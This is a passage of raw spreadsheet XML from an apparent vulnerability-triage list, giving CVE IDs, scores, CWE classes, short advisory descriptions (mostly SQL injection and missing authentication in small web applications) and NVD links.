r="P1958" s="5" t="inlineStr" /><c r="Q1958" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R1958" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Cloud Files Mini Filter Driver allows an authorized attacker to perform tampering locally.</t></is></c><c r="S1958" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83991</t></is></c></row><row r="1959"><c r="A1959" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1959" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1959" s="5" t="inlineStr"><is><t>CVE-2026-85381</t></is></c><c r="D1959" s="5" t="n"><v>5.5</v></c><c r="E1959" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1959" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1959" s="5" t="inlineStr" /><c r="H1959" s="5" t="n"><v>0.003</v></c><c r="I1959" s="5" t="inlineStr" /><c r="J1959" s="5" t="inlineStr" /><c r="K1959" s="5" t="inlineStr" /><c r="L1959" s="5" t="inlineStr" /><c r="M1959" s="5" t="inlineStr" /><c r="N1959" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1959" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1959" s="5" t="inlineStr" /><c r="Q1959" s="5" t="inlineStr"><is><t>CWE-285, CWE-639</t></is></c><c r="R1959" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in light0011 cms c774dce31c6df0055568a8d5c53d964d99be199d/f72cf46f601efb2a0618c3814cc2f61380b38930. This issue affects some unknown processing of the file App/Home/Controller/ChapterController.class.php of the component Chapter Controller. Such manipulation of the argument content leads to authorization bypass. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S1959" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85381</t></is></c></row><row r="1960"><c r="A1960" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1960" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1960" s="5" t="inlineStr"><is><t>CVE-2026-85399</t></is></c><c r="D1960" s="5" t="n"><v>5.5</v></c><c r="E1960" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1960" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1960" s="5" t="inlineStr" /><c r="H1960" s="5" t="n"><v>0.003</v></c><c r="I1960" s="5" t="inlineStr" /><c r="J1960" s="5" t="inlineStr" /><c r="K1960" s="5" t="inlineStr" /><c r="L1960" s="5" t="inlineStr" /><c r="M1960" s="5" t="inlineStr" /><c r="N1960" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1960" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1960" s="5" t="inlineStr" /><c r="Q1960" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R1960" s="5" t="inlineStr"><is><t>A security flaw has been discovered in code-projects Hospital Information System 1.0. Affected by this vulnerability is the function getSinglePresp of the file includes/presp/PrespController.php. Performing a manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks.</t></is></c><c r="S1960" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85399</t></is></c></row><row r="1961"><c r="A1961" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1961" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1961" s="5" t="inlineStr"><is><t>CVE-2026-85517</t></is></c><c r="D1961" s="5" t="n"><v>5.5</v></c><c r="E1961" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1961" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1961" s="5" t="inlineStr" /><c r="H1961" s="5" t="n"><v>0.005</v></c><c r="I1961" s="5" t="inlineStr" /><c r="J1961" s="5" t="inlineStr" /><c r="K1961" s="5" t="inlineStr" /><c r="L1961" s="5" t="inlineStr" /><c r="M1961" s="5" t="inlineStr" /><c r="N1961" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1961" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1961" s="5" t="inlineStr" /><c r="Q1961" s="5" t="inlineStr"><is><t>CWE-200, CWE-284</t></is></c><c r="R1961" s="5" t="inlineStr"><is><t>A flaw has been found in code-projects Vehicle Management System 1.0. The impacted element is an unknown function of the file /vehicle_management.sql of the component SQL Database Backup File Handler. Executing a manipulation can lead to information disclosure. It is possible to launch the attack remotely. The exploit has been published and may be used.</t></is></c><c r="S1961" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85517</t></is></c></row><row r="1962"><c r="A1962" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1962" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1962" s="5" t="inlineStr"><is><t>CVE-2026-85522</t></is></c><c r="D1962" s="5" t="n"><v>5.5</v></c><c r="E1962" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1962" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1962" s="5" t="inlineStr" /><c r="H1962" s="5" t="n"><v>0.005</v></c><c r="I1962" s="5" t="inlineStr" /><c r="J1962" s="5" t="inlineStr" /><c r="K1962" s="5" t="inlineStr" /><c r="L1962" s="5" t="inlineStr" /><c r="M1962" s="5" t="inlineStr" /><c r="N1962" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1962" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1962" s="5" t="inlineStr" /><c r="Q1962" s="5" t="inlineStr"><is><t>CWE-119, CWE-125</t></is></c><c r="R1962" s="5" t="inlineStr"><is><t>A vulnerability was detected in valkey-io valkey up to 9.5.4/9.1.0. Affected by this vulnerability is the function createSlotImportJob of the file src/cluster_migrateslots.c of the component Slot Migration. The manipulation of the argument job_name results in out-of-bounds read. The attack can be executed remotely. The exploit is now public and may be used. Upgrading to version 9.0.5 and 9.1.1 addresses this issue. The patch is identified as f4dc3ca09eb650c2fe14060090a41c524eca803f. Upgrading the affected component is advised.</t></is></c><c r="S1962" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85522</t></is></c></row><row r="1963"><c r="A1963" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1963" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1963" s="5" t="inlineStr"><is><t>CVE-2026-85636</t></is></c><c r="D1963" s="5" t="n"><v>5.5</v></c><c r="E1963" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1963" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1963" s="5" t="inlineStr" /><c r="H1963" s="5" t="n"><v>0.004</v></c><c r="I1963" s="5" t="inlineStr" /><c r="J1963" s="5" t="inlineStr" /><c r="K1963" s="5" t="inlineStr" /><c r="L1963" s="5" t="inlineStr" /><c r="M1963" s="5" t="inlineStr" /><c r="N1963" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1963" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1963" s="5" t="inlineStr" /><c r="Q1963" s="5" t="inlineStr"><is><t>CWE-287, CWE-306</t></is></c><c r="R1963" s="5" t="inlineStr"><is><t>A vulnerability was identified in jofpin trape 1.0.0. Affected by this vulnerability is an unknown functionality of the file core/stats.py of the component Login Endpoint. The manipulation leads to missing authentication. The attack may be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S1963" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85636</t></is></c></row><row r="1964"><c r="A1964" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1964" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1964" s="5" t="inlineStr"><is><t>CVE-2026-85637</t></is></c><c r="D1964" s="5" t="n"><v>5.5</v></c><c r="E1964" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1964" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1964" s="5" t="inlineStr" /><c r="H1964" s="5" t="n"><v>0.004</v></c><c r="I1964" s="5" t="inlineStr" /><c r="J1964" s="5" t="inlineStr" /><c r="K1964" s="5" t="inlineStr" /><c r="L1964" s="5" t="inlineStr" /><c r="M1964" s="5" t="inlineStr" /><c r="N1964" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1964" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1964" s="5" t="inlineStr" /><c r="Q1964" s="5" t="inlineStr"><is><t>CWE-287, CWE-306</t></is></c><c r="R1964" s="5" t="inlineStr"><is><t>A security flaw has been discovered in jofpin trape 1.0.0/2.0. Affected by this issue is the function join_room of the file core/sockets.py of the component Admin Endpoint. The manipulation results in missing authentication. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S1964" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85637</t></is></c></row><row r="1965"><c r="A1965" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1965" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1965" s="5" t="inlineStr"><is><t>CVE-2026-85701</t></is></c><c r="D1965" s="5" t="n"><v>5.5</v></c><c r="E1965" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1965" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1965" s="5" t="inlineStr" /><c r="H1965" s="5" t="n"><v>0.004</v></c><c r="I1965" s="5" t="inlineStr" /><c r="J1965" s="5" t="inlineStr" /><c r="K1965" s="5" t="inlineStr" /><c r="L1965" s="5" t="inlineStr" /><c r="M1965" s="5" t="inlineStr" /><c r="N1965" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1965" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1965" s="5" t="inlineStr" /><c r="Q1965" s="5" t="inlineStr"><is><t>CWE-287, CWE-306</t></is></c><c r="R1965" s="5" t="inlineStr"><is><t>A vulnerability has been found in ramon-victor freegpt-webui up to 098db3dfeb41555c2ca9269df0f13e10ec1c35dc. This issue affects the function ChatCompletion.create of the file g4f/__init__.py of the component Authentication Check. Such manipulation leads to missing authentication. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. This vulnerability only affects products that are no longer supported by the maintainer.</t></is></c><c r="S1965" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85701</t></is></c></row><row r="1966"><c r="A1966" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1966" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1966" s="5" t="inlineStr"><is><t>CVE-2026-85702</t></is></c><c r="D1966" s="5" t="n"><v>5.5</v></c><c r="E1966" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1966" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1966" s="5" t="inlineStr" /><c r="H1966" s="5" t="n"><v>0.004</v></c><c r="I1966" s="5" t="inlineStr" /><c r="J1966" s="5" t="inlineStr" /><c r="K1966" s="5" t="inlineStr" /><c r="L1966" s="5" t="inlineStr" /><c r="M1966" s="5" t="inlineStr" /><c r="N1966" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1966" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1966" s="5" t="inlineStr" /><c r="Q1966" s="5" t="inlineStr"><is><t>CWE-287, CWE-306</t></is></c><c r="R1966" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in ramon-victor freegpt-webui up to 098db3dfeb41555c2ca9269df0f13e10ec1c35dc. Affected is the function _conversation of the file server/backend.py of the component Backend Conversation API. Such manipulation of the argument model leads to missing authentication. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. This vulnerability only affects products that are no longer supported by the maintainer.</t></is></c><c r="S1966" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85702</t></is></c></row><row r="1967"><c r="A1967" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1967" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1967" s="5" t="inlineStr"><is><t>CVE-2026-85875</t></is></c><c r="D1967" s="5" t="n"><v>5.5</v></c><c r="E1967" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1967" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1967" s="5" t="inlineStr" /><c r="H1967" s="5" t="n"><v>0.004</v></c><c r="I1967" s="5" t="inlineStr" /><c r="J1967" s="5" t="inlineStr" /><c r="K1967" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1967" s="5" t="inlineStr" /><c r="M1967" s="5" t="inlineStr" /><c r="N1967" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1967" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1967" s="5" t="inlineStr" /><c r="Q1967" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1967" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1967" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85875</t></is></c></row><row r="1968"><c r="A1968" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1968" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1968" s="5" t="inlineStr"><is><t>CVE-2026-86084</t></is></c><c r="D1968" s="5" t="n"><v>5.5</v></c><c r="E1968" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1968" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1968" s="5" t="inlineStr" /><c r="H1968" s="5" t="n"><v>0.003</v></c><c r="I1968" s="5" t="inlineStr" /><c r="J1968" s="5" t="inlineStr" /><c r="K1968" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1968" s="5" t="inlineStr" /><c r="M1968" s="5" t="inlineStr" /><c r="N1968" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1968" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1968" s="5" t="inlineStr" /><c r="Q1968" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="R1968" s="5" t="inlineStr"><is><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is></c><c r="S1968" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86084</t></is></c></row><row r="1969"><c r="A1969" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1969" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1969" s="5" t="inlineStr"><is><t>CVE-2026-86159</t></is></c><c r="D1969" s="5" t="n"><v>5.5</v></c><c r="E1969" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1969" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1969" s="5" t="inlineStr" /><c r="H1969" s="5" t="n"><v>0.003</v></c><c r="I1969" s="5" t="inlineStr" /><c r="J1969" s="5" t="inlineStr" /><c r="K1969" s="5" t="inlineStr" /><c r="L1969" s="5" t="inlineStr" /><c r="M1969" s="5" t="inlineStr" /><c r="N1969" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1969" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1969" s="5" t="inlineStr" /><c r="Q1969" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R1969" s="5" t="inlineStr"><is><t>A flaw has been found in SourceCodester Online Voting System 1.0. Impacted is an unknown function of the file /ajax.php?action=save_user. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used.</t></is></c><c r="S1969" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86159</t></is></c></row><row r="1970"><c r="A1970" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1970" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1970" s="5" t="inlineStr"><is><t>CVE-2026-86160</t></is></c><c r="D1970" s="5" t="n"><v>5.5</v></c><c r="E1970" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1970" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1970" s="5" t="inlineStr" /><c r="H1970" s="5" t="n"><v>0.003</v></c><c r="I1970" s="5" t="inlineStr" /><c r="J1970" s="5" t="inlineStr" /><c r="K1970" s="5" t="inlineStr" /><c r="L1970" s="5" t="inlineStr" /><c r="M1970" s="5" t="inlineStr" /><c r="N1970" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1970" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1970" s="5" t="inlineStr" /><c r="Q1970" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R1970" s="5" t="inlineStr"><is><t>A vulnerability has been found in SourceCodester Online Voting System 1.0. The affected element is an unknown function of the file /ajax.php?action=delete_voting. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.</t></is></c><c r="S1970" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86160</t></is></c></row><row r="1971"><c r="A1971" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1971" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1971" s="5" t="inlineStr"><is><t>CVE-2026-86162</t></is></c><c r="D1971" s="5" t="n"><v>5.5</v></c><c r="E1971" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1971" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1971" s="5" t="inlineStr" /><c r="H1971" s="5" t="n"><v>0.003</v></c><c r="I1971" s="5" t="inlineStr" /><c r="J1971" s="5" t="inlineStr" /><c r="K1971" s="5" t="inlineStr" /><c r="L1971" s="5" t="inlineStr" /><c r="M1971" s="5" t="inlineStr" /><c r="N1971" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1971" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1971" s="5" t="inlineStr" /><c r="Q1971" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R1971" s="5" t="inlineStr"><is><t>A vulnerability was determined in SourceCodester Online Voting System 1.0. This affects an unknown function of the file /ajax.php?action=login. Executing a manipulation of the argument Username can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.</t></is></c><c r="S1971" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86162</t></is></c></row><row r="1972"><c r="A1972" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1972" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1972" s="5" t="inlineStr"><is><t>CVE-2026-86168</t></is></c><c r="D1972" s="5" t="n"><v>5.5</v></c><c r="E1972" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1972" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1972" s="5" t="inlineStr" /><c r="H1972" s="5" t="n"><v>0.003</v></c><c r="I1972" s="5" t="inlineStr" /><c r="J1972" s="5" t="inlineStr" /><c r="K1972" s="5" t="inlineStr" /><c r="L1972" s="5" t="inlineStr" /><c r="M1972" s="5" t="inlineStr" /><c r="N1972" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1972" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1972" s="5" t="inlineStr" /><c r="Q1972" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R1972" s="5" t="inlineStr"><is><t>A security flaw has been discovered in code-projects Content Management System 1.0. The affected element is an unknown function of the file /login.php. The manipulation of the argument user_name results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.</t></is></c><c r="S1972" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86168</t></is></c></row><row r="1973"><c r="A1973" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1973" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1973" s="5" t="inlineStr"><is><t>CVE-2026-86179</t></is></c><c r="D1973" s="5" t="n"><v>5.5</v></c><c r="E1973" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1973" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1973" s="5" t="inlineStr" /><c r="H1973" s="5" t="n"><v>0.003</v></c><c r="I1973" s="5" t="inlineStr" /><c r="J1973" s="5" t="inlineStr" /><c r="K1973" s="5" t="inlineStr" /><c r="L1973" s="5" t="inlineStr" /><c r="M1973" s="5" t="inlineStr" /><c r="N1973" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1973" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1973" s="5" t="inlineStr" /><c r="Q1973" s="5" t="inlineStr"><is><t>CWE-200, CWE-284</t></is></c><c r="R1973" s="5" t="inlineStr"><is><t>A flaw has been found in code-projects Daily Expense Manager 1.0. Affected is an unknown function of the file /Daily-Expense-Manager/exp_ak.sql of the component Database Backup Handler. Executing a manipulation can lead to information disclosure. It is possible to launch the attack remotely. The exploit has been published and may be used.</t></is></c><c r="S1973" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86179</t></is></c></row><row r="1974"><c r="A1974" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1974" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1974" s="5" t="inlineStr"><is><t>CVE-2026-86180</t></is></c><c r="D1974" s="5" t="n"><v>5.5</v></c><c r="E1974" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1974" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1974" s="5" t="inlineStr" /><c r="H1974" s="5" t="n"><v>0.003</v></c><c r="I1974" s="5" t="inlineStr" /><c r="J1974" s="5" t="inlineStr" /><c r="K1974" s="5" t="inlineStr" /><c r="L1974" s="5" t="inlineStr" /><c r="M1974" s="5" t="inlineStr" /><c r="N1974" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1974" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1974" s="5" t="inlineStr" /><c r="Q1974" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R1974" s="5" t="inlineStr"><is><t>A vulnerability has been found in code-projects Task Management System In PHP 1.0. Affected by this vulnerability is an unknown functionality of the file /index.php of the component Login. The manipulation of the argument email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.</t></is></c><c r="S1974" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86180</t></is></c></row><row r="1975"><c r="A1975" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1975" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1975" s="5" t="inlineStr"><is><t>CVE-2026-86209</t></is></c><c r="D1975" s="5" t="n"><v>5.5</v></c><c r="E1975" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1975" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1975" s="5" t="inlineStr" /><c r="H1975" s="5" t="n"><v>0.004</v></c><c r="I1975" s="5" t="inlineStr" /><c r="J1975" s="5" t="inlineStr" /><c r="K1975" s="5" t="inlineStr" /><c r="L1975" s="5" t="inlineStr" /><c r="M1975" s="5" t="inlineStr" /><c r="N1975" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1975" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1975" s="5" t="inlineStr" /><c r="Q1975" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R1975" s="5" t="inlineStr"><is><t>A weakness has been identified in SourceCodester Class and Exam Timetabling System 1.0. Affected is an unknown function of the file /delete_user.php. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks.</t></is></c><c r="S1975" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86209</t></is></c></row><row r="1976"><c r="A1976" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1976" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1976" s="5" t="inlineStr"><is><t>CVE-2026-86211</t></is></c><c r="D1976" s="5" t="n"><v>5.5</v></c><c r="E1976" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1976" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1976" s="5" t="inlineStr" /><c r="H1976" s="5" t="n"><v>0.003</v></c><c r="I1976" s="5" t="inlineStr" /><c r="J1976" s="5" t="inlineStr" /><c r="K1976" s="5" t="inlineStr" /><c r="L1976" s="5" t="inlineStr" /><c r="M1976" s="5" t="inlineStr" /><c r="N1976" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1976" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1976" s="5" t="inlineStr" /><c r="Q1976" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R1976" s="5" t="inlineStr"><is><t>A flaw has been found in rabindralamsal inventory-management-system 1.0.0. This affects an unknown part of the file index.php of the component Login. Executing a manipulation of the argument username/password can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used.</t></is></c><c r="S1976" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86211</t></is></c></row><row r="1977"><c r="A1977" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1977" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1977" s="5" t="inlineStr"><is><t>CVE-2026-86214</t></is></c><c r="D1977" s="5" t="n"><v>5.5</v></c><c r="E1977" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1977" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1977" s="5" t="inlineStr" /><c r="H1977" s="5" t="n"><v>0.004</v></c><c r="I1977" s="5" t="inlineStr" /><c r="J1977" s="5" t="inlineStr" /><c r="K1977" s="5" t="inlineStr" /><c r="L1977" s="5" t="inlineStr" /><c r="M1977" s="5" t="inlineStr" /><c r="N1977" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1977" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1977" s="5" t="inlineStr" /><c r="Q1977" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R1977" s="5" t="inlineStr"><is><t>A vulnerability was determined in Mstfakts College-Management-System. Impacted is an unknown function of the file Front-end/login.php. This manipulation of the argument email causes improper authentication. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S1977" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86214</t></is></c></row><row r="1978"><c r="A1978" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1978" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1978" s="5" t="inlineStr"><is><t>CVE-2026-86220</t></is></c><c r="D1978" s="5" t="n"><v>5.5</v></c><c r="E1978" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1978" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1978" s="5" t="inlineStr" /><c r="H1978" s="5" t="n"><v>0.003</v></c><c r="I1978" s="5" t="inlineStr" /><c r="J1978" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1978" s="5" t="inlineStr" /><c r="L1978" s="5" t="inlineStr" /><c r="M1978" s="5" t="inlineStr" /><c r="N1978" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1978" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1978" s="5" t="inlineStr" /><c r="Q1978" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R1978" s="5" t="inlineStr"><is><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is></c><c r="S1978" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86220</t></is></c></row><row r="1979"><c r="A1979" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1979" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1979" s="5" t="inlineStr"><is><t>CVE-2026-86221</t></is></c><c r="D1979" s="5" t="n"><v>5.5</v></c><c r="E1979" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1979" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1979" s="5" t="inlineStr" /><c r="H1979" s="5" 